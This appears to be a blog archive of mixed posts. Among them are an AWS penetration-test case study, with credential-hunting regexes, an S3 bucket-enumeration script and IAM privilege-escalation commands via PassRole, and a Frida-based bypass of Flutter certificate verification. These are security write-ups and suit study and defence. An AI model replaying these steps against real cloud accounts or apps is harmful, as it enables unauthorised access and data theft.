
Red Team, Blue Team, and Purple Team: Understanding the Roles in Cybersecurity
Red, Blue, and Purple Teams are terms often used in the context of cybersecurity and information security to describe different roles and approaches in testing and improving the security of an organization’s systems and networks. Here’s an overview of each team and their respective roles:
- Red Team:
  - Role: The Red Team represents the attackers or adversaries. Their primary role is to simulate cyberattacks on an organization’s systems, networks, and infrastructure to identify vulnerabilities and weaknesses.
  - Activities:
    - Conduct penetration testing to exploit vulnerabilities.
    - Use hacking techniques to breach defenses.
    - Mimic real-world attack scenarios.
    - Test the organization’s incident response capabilities.
    - Provide a comprehensive report on findings and recommendations for improvement.
  - Goal: To identify weaknesses in the organization’s security posture, which can help the organization proactively improve its defenses and response capabilities.
  - Benefits: Red Team exercises help organizations identify vulnerabilities and gaps in their security measures that may not be apparent through traditional security assessments.
- Blue Team:
  - Role: The Blue Team represents the organization’s defenders. Their primary role is to protect the organization’s systems, networks, and data from cyber threats and to detect and respond to security incidents.
  - Activities:
    - Monitor and analyze network traffic and system logs.
    - Implement and manage security controls and tools.
    - Develop and maintain incident response procedures.
    - Investigate and respond to security incidents.
    - Continuously assess and improve security measures.
  - Goal: To maintain a strong and resilient security posture, detect and respond to threats in real time, and minimize the impact of security incidents.
  - Benefits: Blue Team activities are crucial for day-to-day security operations, threat detection, and incident response, helping organizations defend against cyber threats.
- Purple Team:
  - Role: The Purple Team is a collaborative effort that combines elements of both the Red Team and Blue Team. Its role is to improve communication and cooperation between these teams.
  - Activities:
    - Conduct controlled exercises with Red Team and Blue Team members working together.
    - Share information about vulnerabilities, attack techniques, and defensive measures.
    - Test and refine incident response procedures in real time.
    - Collaboratively assess and improve security controls.
  - Goal: To enhance the overall security posture of the organization by fostering collaboration between offensive (Red) and defensive (Blue) teams.
  - Benefits: Purple Team exercises promote a more holistic and coordinated approach to cybersecurity. They ensure that Red and Blue Teams work together to address vulnerabilities and threats effectively.
In summary, Red Teams simulate cyberattacks to uncover vulnerabilities, Blue Teams defend against threats and respond to incidents, and Purple Teams facilitate collaboration between the two to enhance an organization’s overall security posture. These teams play essential roles in proactive security testing, incident response, and continuous improvement in the ever-evolving field of cybersecurity.
#cybersecurity #redteam #redteaming #blueteam #purpleteam #InfoSec #cyberdefense

Leveraging AWS IAM Permissions for Complete Cloud Takeover: An Actual Case Study
Part 1 – AWS Security
Introduction: In this real-world case study, we delve into the enumeration and strategic utilization of AWS IAM permissions. It is strongly recommended that you familiarize yourself with my prior article explaining the intricacies of IAM permissions, despite its length, as it serves as a foundational prerequisite for comprehending the tactics employed here. Furthermore, to maintain focus on the more intricate aspects of our exploitation efforts, we will not delve extensively into the simpler vulnerabilities we encountered (some of which have been previously addressed in a separate writeup).
Throughout this study, we will walk through the manual process of enumerating IAM policies and roles, look at automated tools designed for this purpose, and emphasize the importance of not placing absolute trust in automation. Additionally, we will provide a brief tutorial on using “jq.”
Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).
Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the 172.16.0.0/16 subnet.
I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10
AWS provides three methods for accessing resources:
- Through the web console
- Through the command line interface (CLI)
- Through APIs
To use the CLI, you require an access key, a secret key, and optionally a token. Access keys and secret keys can be identified using the following regular expressions:
grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *
After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”
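As an added example (not part of the original article), here is a Python equivalent of the two grep patterns above, for scanning a downloaded configuration tree for leaked AWS keys. It goes slightly beyond the greps: a 20-character hit is reported at higher confidence when it carries the AKIA or ASIA prefix that AWS long-term and temporary access key IDs start with, which cuts down on false positives from upper-case hashes. The sample core-site.xml is constructed; the key values in it are the placeholder credentials AWS uses in its own documentation, not real keys.

```python
import re
from pathlib import Path
from typing import Dict, List

# The two patterns from the article's grep -P commands, unchanged.
ACCESS_KEY_RE = re.compile(r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])')
SECRET_KEY_RE = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# Long-term access key IDs begin with "AKIA" and STS temporary ones with "ASIA".
# A 20-character hit with neither prefix is usually noise (e.g. an upper-case hash).
KNOWN_PREFIXES = ("AKIA", "ASIA")


def scan_text(text: str) -> Dict[str, List[str]]:
    """Return candidate access key IDs (by confidence) and secret keys in one document."""
    access = ACCESS_KEY_RE.findall(text)
    return {
        "access_keys_high": [k for k in access if k.startswith(KNOWN_PREFIXES)],
        "access_keys_low": [k for k in access if not k.startswith(KNOWN_PREFIXES)],
        "secret_candidates": SECRET_KEY_RE.findall(text),
    }


def scan_tree(root: Path) -> Dict[str, Dict[str, List[str]]]:
    """Recursive scan (the -R of grep): map each file with hits to its findings."""
    findings = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        hits = scan_text(text)
        if any(hits.values()):
            findings[str(path)] = hits
    return findings


# Constructed sample: a Hadoop core-site.xml carrying S3A credentials. The values are
# the example credentials from AWS documentation (placeholders, not real keys).
SAMPLE_CORE_SITE = """<configuration>
  <property>
    <name>fs.s3a.access.key</name>
    <value>AKIAIOSFODNN7EXAMPLE</value>
  </property>
  <property>
    <name>fs.s3a.secret.key</name>
    <value>wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</value>
  </property>
  <property>
    <name>fs.defaultFS</name>
    <value>hdfs://namenode:9000</value>
  </property>
</configuration>
"""

if __name__ == "__main__":
    for kind, values in scan_text(SAMPLE_CORE_SITE).items():
        print(f"{kind}: {values}")
```

Point `scan_tree` at the directory you synced the files into; secret-key hits should be paired with a nearby access key ID before being treated as a credential, since any 40-character base64-like token (a hash, a token) also matches the second pattern.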
Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.
I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used Rhino Security Labs’ “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.
Unfortunately, it appeared that the account did not even have “GetUser” privileges. However, there were still other avenues to explore. Let’s return to the S3 route.
Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.
aws configure --profile test

aws --profile test s3 ls
There were approximately 180 buckets. We began reading them with:
aws --profile test s3 ls s3://backup-db-logs
This also presented a challenge as it turned out that the account had permissions to list the buckets but not to read them. To identify buckets that we could read, various tools were available, but we preferred to create our own scripts for better control over the process:
```bash
#!/bin/bash
# enumerateReadBuckets.sh: list the S3 buckets a given profile can actually read.
# Usage: bash enumerateReadBuckets.sh --profile <name>

# Pick the profile name that follows "--profile" on the command line.
profile=""
for i in "$@"; do
  if [[ $i == "--profile" ]]; then
    profile=$(echo "$@" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
    # Read the key pair from the credentials file for reference; the aws calls below use --profile.
    AWS_ACCESS_KEY_ID=$(grep -i "$profile" -A 2 /root/.aws/credentials | grep -i = | cut -d " " -f 3 | head -n 1)
    AWS_SECRET_ACCESS_KEY=$(grep -i "$profile" -A 2 /root/.aws/credentials | grep -i = | cut -d " " -f 3 | tail -n 1)
    break
  fi
done
if [ -z "$profile" ]; then
  echo "Usage: $0 --profile <name>" >&2
  exit 1
fi

echo "Enumerating the buckets..."
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
echo "You can read the following buckets:"
>/tmp/readBuckets   # truncate the result file before appending to it
for i in $(cat /tmp/buckets); do
  # A listing that returns at least one line means the bucket is readable.
  result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
  if [ ! -z "$result" ]; then
    echo "$i" | tee -a /tmp/readBuckets   # -a appends; plain tee would keep only the last hit
    unset result
  fi
done
```
Invoke the script using:
bash enumerateReadBuckets.sh --profile test
We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.
for i in $(enumerateReadBuckets --profile test | tail -n +1); do aws s3 sync s3://"$i" .; done
However, our script did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.
We started with our first bucket, which we’ll refer to as “bucket1.”
aws --profile test s3 ls s3://bucket1

aws --profile test s3 ls s3://bucket1/conf/

aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .
Excellent! We found new credentials. Let’s create a new profile to use them.
aws configure --profile test2
Now, let’s perform a brute-force analysis of our permissions:
./aws_escalate.py --access-key-id AKID --secret-key SK
This new account appears to have significantly more permissions than our initial one. Let’s attempt to add a new user:
./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER
Unfortunately, we still did not obtain an admin account. However, we managed to escalate privileges manually. Let’s explore how.
Now, this is where our reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user. However, the “test2” account lacks the necessary “GetUser” permissions. Fortunately, there are alternative methods for obtaining information about the user you’re operating under. One such method involves using the Security Token Service API:
aws sts get-caller-identity
Now that we’ve identified the user, we can specify it manually:
./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER
The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.
Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:
Description: An attacker with the iam:PassRole and ec2:RunInstances permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.
Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:
- Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
- Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).
Consider the method mentioned above. Having PassRole and RunInstances privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configuration. Enumerating security groups is essential to determine which one to assign to the instance, or whether you have privileges to create new ones.
However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.
Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:
aws --profile PROFILE iam list-roles | head -n 10
Great! We have list-roles privileges. Now, there are two criteria for identifying a suitable role for hijacking:
- The role should have an Administrator policy or a similar highly privileged policy attached.
- The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.
For the first criterion, we can list the associated managed policies with:
aws --profile PROFILE iam list-attached-role-policies --role-name ROLE
We can also list the inline policies with:
aws --profile PROFILE iam list-role-policies --role-name ROLE
Let’s attempt this with the “Administrators” role as an example:
aws --profile PROFILE iam list-attached-role-policies --role-name Administrators
Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:
aws --profile PROFILE iam get-role --role-name ROLE
This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.

But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. In this case, the user didn’t have permission to use get-role, but it did have permission to use list-roles. Amazon’s documentation states that this call lists roles with a specified path prefix and returns an empty list if none are found. That definition can be misleading: with this call you can specify --path-prefix to search for roles with a specific prefix, and if you omit it, it defaults to a slash (“/”), effectively returning every role, each with its trust policy document, which replaces the need for get-role for our specific use case. Anyway, let’s give it a try:
aws --profile PROFILE iam list-roles
Great! Now we need a way to list the roles that have an assume role policy with AWS EC2 as a trustee. To filter these roles, we’ll use jq, a tool for parsing JSON output. Let’s break down how to use it step by step. First, let’s examine the structure we need to parse, considering one role from the output:
The information we need is listed under “Principal,” and it should look something like:
"Principal": {
"Service": "ec2.amazonaws.com"
}
Let’s select only the fields we’re interested in with:
aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'
This command will filter for the RoleName and the Principal Service.
However, the output may not match the example we provided earlier because not all results will look exactly the same. Some might involve a different Principal, such as a Federated Principal:
This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:
aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'
We’re getting closer. Now, let’s refine the results:
aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u
This command retrieves every role whose trust policy has a “Principal.Service”, printing the role name followed by the service. grep -B 1 keeps only the “ec2.amazonaws.com” lines together with the role name line preceding each, grep -v then drops the “ec2.amazonaws.com” lines themselves, and sort -u sorts the remaining role names and removes duplicates (a trailing uniq would be redundant).
Now we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies and list-role-policies, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.

Bypassing Root CA Checks in Android Apps Built with Flutter
Android App Security:
In this post, I will explore the topic of bypassing Root Certificate Authority (CA) checks in Android applications developed using the Flutter framework. Although it is important to note that bypassing these security measures is generally not recommended, I aim to provide insights into the technical aspects for educational purposes only.
Understanding Root CA Checks:
Root CA checks are a fundamental security measure in Android applications that validate the authenticity and integrity of SSL/TLS connections. These checks ensure that the server’s certificate is issued by a trusted CA and has not been tampered with. Bypassing these checks allows one to perform Man-in-the-Middle attacks, such as using BurpSuite.
Limitations in Flutter:
Flutter, as a cross-platform framework, leverages platform-specific APIs for networking operations. However, as of the latest update, Flutter does not provide direct access to low-level networking APIs, making it difficult to bypass Root CA checks solely within the Flutter framework.
Recently, I delved into Android applications developed using the Flutter framework, which was a new territory for me. While engaging in a discussion unrelated to app testing, I stumbled upon an app to analyze. Excited about the opportunity, I launched the app on my mobile device, connected it to a testing WiFi network and fired up burpsuite, and soon encountered a familiar challenge faced by app testers.
Wonderful! They’re doing something right by preventing Burp’s root CA from being used, and I could probably bypass this with Frida. I pulled the .apk apart and found…
After a bit of reading about the Flutter Engine, it seems the majority of the work is performed by “libflutter.so”. This became more apparent after starting “frida-trace” and setting up intercept scripts for all the usual SSL methods you’d need to bypass: although the libraries were loaded, I didn’t see a single call to any of the methods, and the SSL connection still failed to start.
So I dug further. After some more research I found out that Flutter bundles the BoringSSL libraries into “libflutter.so” and performs its own verification steps rather than trusting the OS’s mechanisms. It also forces the use of a known set of root certificates, which goes some way to explaining why I couldn’t MITM the connection.
In summary, Flutter integrates BoringSSL into “libflutter.so” and implements its own SSL verification steps, bypassing the OS’s SSL mechanisms. The enforced use of trusted Root certificates and the challenge of analyzing the stripped library make it essential to monitor logcat output for insights into the SSL connection process. These findings are valuable for security assessments and custom SSL handling in Flutter-based Android apps.
Breaking out Ghidra and loading the shared object wasn’t much better as the library had been stripped of symbols, making it tough to find the verification functions. I fired up the app again and watched the output of logcat to see if it gave me any clues:
See the line containing “handshake.cc”? After some trawling through strings and references in Ghidra I found some methods that contained it:
The 0x160 seems to correspond to the line number in the source that generates the error, so I grabbed the BoringSSL code and started looking for X.509 verification functions. One cropped up in “ssl_x509.cc”:
Searching Ghidra for this file name showed up the full path string as expected, tracing cross-references to that string dumped me in the middle of a call to “FUN_00316500” above with a line number value that roughly matched the source file. Bingo!
To get this check to pass, all I’d have to do would be:
- Calculate the actual address of the function in the phone’s memory
- Build a Frida Interceptor script to trap it
- Alter the return value to “true”
Calculating the offset of the function could be done by finding the virtual address of a function we know the name of, working out the target function’s offset from it, and then adding that offset to the actual address of the first function.
The Flutter shared object exports one function, “JNI_OnLoad”, which is called by the Android runtime during startup. Frida could find the address of this easily, so that made for a good base function to start with. The offset of the X509 function from this could be calculated and added to the base address easily; setting up an interception for it showed repeated calls to the method whenever I forced the app to make a request:
See how the “ret” value is “0x0”? Let’s patch that out:
Problem solved!
This was definitely a much harder one to crack than most apps. I’m expecting people will hide behind that as a form of “security” and forget to secure the APIs the app interfaces with 🙂
I grabbed a few more Flutter apps and checked the MD5 hashes of their “libflutter.so” files; they differ in most cases, which means each app will need the offset of “ssl_crypto_x509_session_verify_cert_chain” calculating separately. I’m not sure whether this can be automated given the lack of debug symbols, but honestly it’s not that much of a problem when testing only a single app.
#FlutterApp #Androidsecurity #Applicationsecurity #infosec

Application of AI, Machine Learning and Data Analytics in Healthcare.
The combination of AI, machine learning, and data analytics provides researchers and scientists with powerful tools to process and interpret large volumes of complex healthcare data. Here’s how these technologies work together:
- Data Processing and Integration: AI, machine learning, and data analytics techniques can handle large volumes of healthcare data, including patient records, genetic information, medical images, and research articles. These technologies can process and integrate diverse data sources, ensuring that relevant information is captured and organized for analysis.
- Pattern Recognition and Data Mining: Machine learning algorithms can identify patterns, trends, and correlations within the data. By training the algorithms on a vast amount of healthcare data, they learn to recognize complex relationships and indicators that may be difficult for humans to detect. This enables researchers to uncover valuable insights and potential associations between variables.
- Feature Extraction and Selection: Machine learning algorithms can automatically extract relevant features from healthcare data. For example, in genetic data, algorithms can identify specific gene variants or mutations that may be associated with rare diseases. Feature selection techniques help researchers identify the most informative and predictive features for accurate diagnostics or research purposes.
- Predictive Modeling and Decision Support: Machine learning models can be developed to predict outcomes, such as disease diagnoses or treatment responses, based on the available data. These models can assist researchers and clinicians in making informed decisions by providing evidence-based recommendations or predictions. This decision support can aid in early diagnosis, personalized treatment planning, and improving patient outcomes.
- Data Visualization and Interpretation: AI and data analytics tools offer visualization techniques that facilitate the interpretation of complex healthcare data. Graphs, charts, and interactive dashboards can present the data in a visually meaningful way, enabling researchers to understand trends, relationships, and anomalies more easily. Visual representations can help communicate findings and support data-driven decision-making.
- Continuous Learning and Improvement: AI and machine learning algorithms have the ability to continuously learn and adapt. As researchers incorporate new data and insights, the algorithms can update their models and refine their predictions. This iterative learning process improves the accuracy and effectiveness of the analyses over time, enabling researchers to uncover new knowledge and refine their understanding of rare diseases.
By leveraging AI, machine learning, and data analytics, researchers and scientists can effectively process, integrate, and interpret large volumes of complex healthcare data. These technologies enable them to discover meaningful patterns, make predictions, gain valuable insights, and support evidence-based decision-making in the field of rare disease diagnosis and research.

Talking about Information Security Awareness
Information Security Awareness
In today’s society, with the rapid development of new-generation information technologies such as artificial intelligence and big data, people’s lives have become more and more convenient and fast. However, while we enjoy this technological life, we do not realize that we have been exposed to dangers such as information fraud, information capture and information harassment. Compared with the traditional means of fraud in the past, today’s criminals take advantage of the efficiency of technology and of network security loopholes to carry out fraud, making it even more difficult for people to guard against. Perhaps it is some small negligence in daily life that leads to personal information leakage and creates information security risks.
Informatization has changed people’s work, study and living habits, making people more dependent on computer networks. While enjoying the various conveniences it brings, people often lack information security awareness and ignore information security safeguards. People’s information security awareness is gradually established through awareness and understanding of information security. This post analyzes and discusses the connotation of information security awareness and the current state of information security development, and puts forward effective measures to strengthen information security awareness.
The importance of information security
Information security is the cornerstone of informatization construction and the guarantee for the normal operation and effectiveness of information networks. It has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and ensure information security is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a trump card in future international competition. The development of society and the arrival of the digital network era have changed many aspects of people’s lives. Bank deposits and withdrawals anywhere, including in other cities, surfing the Internet, online shopping and online transactions all bring convenience to people’s lives. But while computers and networks bring convenience and speed, they also impose some conditions. Nowadays, people carry less cash and more cards of various kinds, such as bank credit cards, medical and social security cards, salary cards and so on. These cards are truly convenient, but precisely because they are so convenient, the computer system only recognizes the cardholder and does not identify the real owner of the card, so to protect the information on the card people have to set passwords and more for each of them. This is an information security issue: people set various passwords for the security of their information.
With the development and popularization of the Internet, network viruses, network attacks, and network crimes have rapidly reached an unprecedented rampant level. Today’s viruses can spread rapidly across the world within ten minutes, disrupting the global economy in an instant. Network security has become the focus of global attention, and hackers and computer viruses are threatening the normal operation of various departments. When people increasingly rely on computer networks, they find that the network is so fragile. Therefore, information security has been paid more and more attention all over the world, and information security has become an important symbol to measure whether an information system is perfect.
The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.
Main content of information security
The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.
Information security mainly refers to maintaining the confidentiality, integrity and availability of information, that is, using computer software and hardware technology, network technology, cryptographic (key) technology and other security technologies, together with various organizational management measures, to protect information throughout its life cycle, so that its confidentiality, integrity and availability are not destroyed at any stage of generation, transmission, exchange, processing and storage.
Confidentiality means ensuring that only those who have been granted specific permissions have access to information. The confidentiality of information varies according to the number of parties allowed to access it. Information that everyone can access is public information, and information whose access must be restricted is sensitive or secret information. According to the importance of the information and its confidentiality requirements, information is divided into different levels of confidentiality; internal military documents, for example, are generally divided into three levels: secret, confidential and top secret. Authorized users may operate on confidential information according to the rights they have been granted: some users can only read information, while others can both read and write.
Integrity of information means ensuring the correctness and completeness of information and of processing methods. On the one hand, integrity means that no tampering, loss of information or erroneous information occurs while information is used, transmitted and stored; on the other hand, it refers to the correctness of information processing methods, since improper operations may cause the loss of important files or even paralyze the entire system.
Availability of information means ensuring that authorized users can indeed access the information they need when they need it; that is, information and related information assets can be obtained immediately when an authorized person needs them. For example, interruption of communication lines and network congestion make information unavailable for a period of time and affect normal business operations, which is a destruction of information availability. Systems that provide information must be able to withstand attacks appropriately and recover from failure. In addition, the authenticity and validity of information must be guaranteed, that is, business transactions and information exchanges between organizations or between organizations and partners must be trustworthy.
Information Security Development Status
Information security can be regarded as an emerging industry in the process of China’s informatization construction. In general, its development trajectory includes the following three stages:
⑴ The budding stage
Before 2005, various industries and departments in China began to develop an awareness of information security: from the initial “emphasis on information construction” while “ignoring the construction of security systems”, to “awareness of the importance of security” and “hoping to realize information security”, yet still regarding information security as very mysterious and not knowing where to start. At this stage, customers in various industries were consciously learning and accumulating information security knowledge and conducting extensive exchanges with authorities in the field to understand their technologies, concepts, products and services. At the same time, some small-scale and sporadic information security construction appeared in some enterprises and departments, but it did not achieve scale or systematization. Moreover, government macro-policy on information security in this period consisted more of appeals than of specific matters to be promoted; although it seemed very lively, very little information security construction actually took place.
⑵ The outbreak stage
After 2005, the needs of domestic industries and departments for information security construction changed from “spontaneous” to “conscious”. Customers had basically understood the content and significance of information security construction, and many industry departments began to plan and deploy internal information security construction. Leaders in various industries attached great importance to it and continued to increase investment, so information security became the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to have been caused by the “debts” accumulated by various industries in information security over the years.
⑶ The popularization stage
When information security construction is integrated with the overall information construction of various industries, information security becomes one of the key links in IT construction. It is as important and ubiquitous as air, yet not easily noticed.
In the next 3 to 5 years, the information security market will maintain high-speed, large-scale development, and telecommunications, government and finance will be the industries with the greatest demand for information security. The telecommunications and financial industries involve large investment, fast development, a high degree of informatization, complex needs and a relatively severe security situation, while government departments, owing to their high position and urgent security needs, serve as role models to the outside world, so their investment in information security will also increase.
The biggest security issue in the 21st century is information security, as well as economic security, political security, military security, social security, technological security, and cultural security based on information security. The weakest link in information security is likely to be careless people, not software bugs. Hackers have captured many extremely complex networks, not only relying on superb technology, but also exploiting human weaknesses. Only by raising people’s security awareness to a very high level can we fundamentally reduce the risk of information security.
Effective Measures to Improve Information Security Awareness
A good information security environment is needed to further deepen reform and opening up and to promote China’s socialist modernization, and it is also a foundation of national security. The premise of a good information security environment is that all citizens have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.
1. Improve the information security awareness of leading cadres
Leading cadres at all levels are not only the main generators, transmitters, users and custodians of sensitive information, but also the main targets of those who steal it. Therefore, to improve information security awareness, the information security competence of leading cadres at all levels is particularly important. Only when leaders raise their own awareness of information security can they take information security work seriously, strictly implement laws and regulations, and rigorously organize and carry out information security inspections; only then can information security work be effective and well done.
2. Improve the information security awareness of confidential personnel
Secret-related personnel are important managers of secret information security and are responsible for sending, receiving and keeping confidential secret information. Building a strong team of secret-related personnel and improving their quality is the key to doing a good job in information security. Improving their quality means, in addition to raising ideological understanding, cultivating a scientific and rigorous style of work, and strictly abiding by laws, regulations and internal rules, providing professional training on information security and confidentiality under high-tech conditions, so that they master the use of modern technical tools to manage documents and archives, are familiar with their own business, have keen judgment and insight into phenomena that may cause leakage of secrets, and master a certain level of anti-theft technology.
3. Improve the information security awareness of professional and technical personnel
Professional and technical personnel are the new force of information security management in China and the operators and maintainers of information security. They must have sufficient information security knowledge, fully understand the security properties of the relevant security technologies, operating systems and application software, keep track of security news and developments in security technology, and develop good information security habits. The government should actively promote exchanges between China’s information technology professionals and other countries in the cultivation of information security awareness. Learning from successful foreign experience, using foreign research results, drawing on foreign educational strength, and introducing excellent foreign teaching materials and related theories is a shortcut to rapidly raising the level of information security awareness training for professional and technical personnel in China.
4. Raise the awareness of information security of the whole people
In order to enhance citizens’ awareness of information security and improve awareness of national information security, it is necessary to carry out information security education for the whole people. To ensure the security of the party’s and the state’s secrets under any circumstances, the most fundamental thing is to do a good job in ideological education and improve the information security awareness of the whole people. All industries and government information management departments at all levels should use public opinion and the media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities; establish a system of security training for users at different levels and gradually improve the technical level of computer users through tiered training; and organize the study of laws and regulations on information security work, popularize information security common sense, and introduce information security technologies. Only when the information security awareness of the whole people is enhanced will information security be fully guaranteed.

What is Web3
First, let’s look at the previous generations:
Web 1.0 (1980-2000)
The first wave of the Internet began in the 1980s; the iconic event was two computers “communicating” with each other over a shared protocol. That protocol is TCP/IP, created in 1983.
The network (World Wide Web) of this period could not do much “interconnection”; most information was read-only.
Netscape is typical of this period: publishing information on the Internet.
- High technical barriers to access
- No information indexing function
Web2.0 (2001-present)

Web 3.0 (concept was born in 2014)


- Content is censored and deleted
- Malicious comments
- The content is randomly quoted or plagiarized
- The economic interests of creators are determined by the platform
Medium (Web2 product)
Mirror (Web3 product)
Summary
By comparing the two products, Medium and Mirror, we can see that blockchain distributed storage offers a commercially feasible technical solution for transparency and tamper resistance of information.

Application of Blockchain Technology in Education and Other Sectors
Blockchain technology is regarded as another disruptive technology after cloud computing, the Internet of Things and big data, and has received a high level of attention from governments, financial institutions and enterprises. Essentially, blockchain technology is a technical scheme for maintaining a reliable database by means of decentralization and high trust. Its core technologies include distributed ledger technology, asymmetric encryption algorithms and smart contracts, and its distinguishing characteristics are decentralization, a consensus mechanism, traceability and high trust. Nowadays, as the underlying technology of Bitcoin, blockchain technology is not only applied in the field of finance but also has great potential in education.
What’s more, blockchain technology is expected to play an important role in the construction of an “Internet + education” ecology and in promoting reform of the education system. Drawing on the experience and lessons of applying blockchain in the financial field, blockchain in education is mainly embodied in six areas of application: establishing individual knowledge on big data, creating intelligent education platforms, developing degree certificate systems, constructing a new ecology of open education resources, achieving “self-organized” operation of networked learning communities, and developing the decentralization of the education system.
As seen:
- In the financial field, global banking giants have formed the R3 Alliance, including more than 40 large international financial institutions such as HSBC, UBS, and Bank of America, to jointly develop blockchain technology. Nasdaq in the United States took the lead in launching Linq, a securities trading platform based on blockchain technology, which became an important milestone in the trend of decentralization in the financial securities market. Clearly, it is necessary to pay close attention to the impact of blockchain and other technologies on the financial sector.
- In the field of technology, IBM and The Linux Foundation have established a dedicated blockchain open source project, Hyperledger Fabric, which has entered the substantive development stage. IBM will provide the Watson API on the Watson IoT platform to help enterprise customers and developers develop and test cloud-based IoT applications, with the aim of using blockchain to bring autonomy to the Internet of Things.
- In the field of energy, foreign companies have launched energy blockchain projects. For example, Germany’s Siemens has cooperated with a New York start-up to apply blockchain technology to the microgrid power trading market, and the American energy company LO3 Energy and the blockchain development company ConsenSys cooperated to build TransActive Grid, an interactive grid platform based on a blockchain system, for a small number of residents in the Gowanus and Park Slope neighborhoods of Brooklyn, New York.
- In the field of food, a research report from the University of Saad in the United Kingdom pointed out that if blockchain technology is applied to the food supply chain, making food data transparent may reduce food waste. In addition, Walmart is trying to use blockchain technology to record the source of food, giving consumers more information about it and thereby addressing some of the current disorder in the food industry.
- In the medical field, Philips Medical and Tierion have cooperated to allow Philips Medical to use blockchain technology to complete the authentication of medical records and the privacy protection of patients. Blockchain technology helps to solve the large-scale data quality problems that the medical industry is currently suffering from, and provides the medical industry with a unique source of authentic data, so that the system will no longer suffer from human errors or manual data reconciliation, thereby solving the problem of medical data trust.
Enlightenment on the application of blockchain in the field of education
The application of blockchain technology is bringing disruptive changes to the financial sector and creating new business opportunities. Studying the application modes of blockchain technology in the financial field shows that its value to innovation and development there lies mainly in: eliminating intermediary trading platforms and reducing transaction costs; realizing real-time transaction settlement and improving transaction efficiency and asset utilization; storing transaction data in a distributed format that cannot be tampered with and has high security; and automating the transaction process on the basis of smart contracts. The application scenarios and models of blockchain technology in the financial field provide the following lessons for its application in the education field:
